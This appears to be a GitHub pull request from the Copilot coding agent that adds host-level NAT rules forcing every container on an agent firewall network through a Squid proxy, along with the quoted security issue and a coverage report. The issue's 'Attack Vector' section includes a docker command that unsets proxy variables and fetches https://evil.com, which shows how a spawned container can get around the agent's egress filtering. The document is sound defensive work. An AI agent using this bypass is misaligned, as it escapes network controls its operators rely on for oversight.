fix: add host-level NAT rules to redirect HTTP/HTTPS traffic for all containers on awf-net

[Copilot]

NAT rules that redirect HTTP/HTTPS traffic to Squid only existed inside the agent container. Any other container on awf-net that ignored HTTP_PROXY would have traffic blocked but not proxied.

Changes

• New FW_WRAPPER_NAT chain in host's nat table PREROUTING

  • DNAT rules redirect ports 80/443 to Squid for all traffic from fw-bridge
  • RETURN rules for traffic from/to Squid IP to prevent redirect loops

• Cleanup logic updated in cleanupHostIptables() to remove NAT chain on shutdown

• Unit tests added for NAT chain creation and cleanup

Traffic flow after this change

Container on awf-net
    ↓
Host PREROUTING → FW_WRAPPER_NAT → DNAT to Squid:3128
    ↓
Squid (domain ACL filtering)

All containers on awf-net now have HTTP/HTTPS transparently proxied regardless of whether they respect HTTP_PROXY environment variables.

Original prompt

---

This section details on the original issue you should resolve

<issue_title>[Security] Child containers don't inherit NAT rules - proxy bypass possible</issue_title>
<issue_description>## Priority
P1 - High

Summary

NAT rules that redirect HTTP/HTTPS traffic to Squid only apply to the agent container. When the agent spawns child containers (e.g., for MCP servers), these containers do NOT have the same NAT rules. They rely solely on:

1. HTTP_PROXY environment variables (can be ignored by applications)
2. Host iptables default deny (blocks unknown IPs, but doesn't force proxy)

Current Behavior

Agent container has NAT rules:

iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 172.30.0.10:3128
iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination 172.30.0.10:3128

Spawned child containers do NOT have these rules:

# In agent container (works - NAT redirects to Squid)
curl https://blocked.com  # → Squid → denied

# In spawned container (bypasses NAT if ignores HTTP_PROXY)
docker run alpine curl https://blocked.com  # → May succeed if host iptables allows

Attack Vector

# Spawn container that ignores proxy environment variables
docker run --rm alpine sh -c '
  unset HTTP_PROXY HTTPS_PROXY http_proxy https_proxy
  wget https://evil.com  # No NAT redirect in this container
'

Current Mitigations

1. docker-wrapper.sh injects --network awf-net and proxy env vars
2. Host iptables has default deny for non-Squid traffic

Why This is Insufficient

• Applications can ignore HTTP_PROXY environment variables
• Some tools (e.g., wget --no-proxy) explicitly bypass proxy
• Library code may not respect proxy settings
• Container may install tools that don't use env vars

Proposed Solutions

Option A: Inject NAT setup into child containers

Modify docker-wrapper.sh to:

1. Add --cap-add NET_ADMIN to all spawned containers
2. Inject iptables setup script as entrypoint prefix

# In docker-wrapper.sh
INIT_SCRIPT="iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 172.30.0.10:3128 && \
             iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination 172.30.0.10:3128"

DOCKER_ARGS="$DOCKER_ARGS --cap-add NET_ADMIN"
DOCKER_ARGS="$DOCKER_ARGS --entrypoint sh"
# Prepend NAT setup to original entrypoint

Option B: Shared network namespace

1. Create a network namespace with NAT rules
2. All child containers share this namespace
3. NAT rules apply to all traffic in the namespace

Option C: Transparent proxy mode

Configure Squid as a transparent proxy with host-level traffic interception for all containers in awf-net.

Files to Modify

• containers/agent/docker-wrapper.sh:82-92 - Network injection logic
• src/docker-manager.ts - Container configuration
• Potentially: Host-level iptables for transparent proxy

Verification Test

sudo awf --allow-domains github.com -- /bin/bash -c '
  echo "--- Child container NAT rules ---"
  docker run --rm --network awf-net --cap-add NET_ADMIN \
    alpine sh -c "apk add iptables -q && iptables -t nat -L -n 2>/dev/null | grep DNAT || echo 'No NAT rules'"
'
# Expected: "No NAT rules" (current behavior - the gap)

Related

• Issue [Security] Docker socket access allows container escape and firewall bypass #10 (Docker socket access)
• containers/agent/docker-wrapper.sh - Docker interception</issue_description>

Comments on the Issue (you are @copilot in this section)

• Fixes [Security] Child containers don't inherit NAT rules - proxy bypass possible #130

---

💡 You can make Copilot smarter by setting up custom instructions, customizing its development environment and configuring Model Context Protocol (MCP) servers. Learn more Copilot coding agent tips in the docs.

[github-actions]

⚠️ Coverage Regression Detected

This PR decreases test coverage. Please add tests to maintain coverage levels.

Overall Coverage

Metric	Base	PR	Delta
Lines	77.88%	77.53%	📉 -0.35%
Statements	77.94%	77.59%	📉 -0.35%
Functions	77.29%	77.41%	📈 +0.12%
Branches	71.00%	70.44%	📉 -0.56%

📁 Per-file Coverage Changes (1 files)

File	Lines (Before → After)	Statements (Before → After)
src/host-iptables.ts	79.3% → 76.4% (-2.83%)	79.5% → 76.6% (-2.85%)

---

Coverage comparison generated by scripts/ci/compare-coverage.ts